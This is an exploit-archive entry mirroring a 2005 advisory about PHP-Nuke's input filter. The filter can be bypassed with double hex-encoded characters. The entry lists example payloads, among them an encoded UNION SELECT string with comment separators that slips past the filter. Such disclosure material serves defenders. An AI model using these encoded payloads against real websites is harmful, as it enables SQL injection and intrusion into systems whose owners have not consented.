PHP-Nuke 0-7 - Double Hex Encoded Input Validation

Author: fistfuxxer@gmx.de
type: webapps
platform: php
port: 
date_added: 2005-05-09  
date_updated: 2013-05-22  
verified: 1  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 25635.txt  
source: https://www.securityfocus.com/bid/13557/info

PHP Nuke is prone to an input validation vulnerability. Reports indicate the script fails to correctly identify potentially dangerous characters when the characters are double hex-encoded (i.e. %25%41 == %41 == A).

A remote attacker may exploit this issue to bypass PHP Nuke protections and exploit issues that exist in the underlying PHP Nuke installation.

Will be filtered:
'modules.php?FistFucker=()'

Will be bypassed:
'modules.php?FistFucker=%2528%2529'


Will be filtered:
'/**/UNION/**/SELECT/**/'

Will be bypassed:
'/%2A%2A/UNION/%2A%2A/SELECT/%2A%2A/'